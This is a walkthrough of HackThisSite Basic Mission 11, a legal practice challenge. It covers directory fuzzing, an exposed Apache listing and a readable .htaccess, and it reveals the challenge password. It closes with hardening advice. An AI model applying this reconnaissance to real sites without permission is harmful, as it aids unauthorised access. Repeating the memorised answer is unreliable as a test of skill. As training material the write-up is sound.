HackThisSite — Basic Mission 11

---

Reconnaissance

The page shows no input or submit button — just text. No obvious injection point. Attack surface = the directory structure itself.

---

Step 1 — Directory Fuzzing with Burp Suite

Fuzzed single letters (a-z) at:

/missions/basic/11/<letter>

/e returned 301 Moved Permanently → valid directory.

Navigated to:

/missions/basic/11/e/

→ Apache directory listing enabled. Found subfolder: l/

---

Step 2 — Manual Traversal

Followed the rabbit hole:

/e/ → /l/ → /t/ → /o/ → /n/

At /e/l/t/o/n/ — empty directory listing. Dead end.

---

Step 3 — Fuzz Again (Online URL Fuzzer)

Fuzzed /missions/basic/11/e/l/t/o/n/ for hidden files.

Found: .htaccess (HTTP 200)

Contents:

IndexIgnore DaAnswer.* .htaccess
<Files .htaccess>
require all granted
</Files>

IndexIgnore DaAnswer.* → the password file is named DaAnswer

---

Step 4 — Access DaAnswer

/missions/basic/11/e/l/t/o/n/DaAnswer/

Response: "The answer is somewhere! Just look a little harder."

The word somewhere = the password.

---

Step 5 — Find the Submit Form

No form on the main page. Tried:

/missions/basic/11/index.php

→ Password input field found. Submitted somewhere → Congratz!

---

Root Cause

Three misconfigurations chained together:

1. Apache directory listing enabled — exposes full folder tree
2. .htaccess publicly readable — leaks internal file naming convention
3. Password stored in a web-accessible directory — trivially retrievable

---

Key Takeaway

Disable Apache directory listing (Options -Indexes). Never store secrets in web-accessible directories. .htaccess files must never be publicly readable — they often reveal more about the server structure than intended.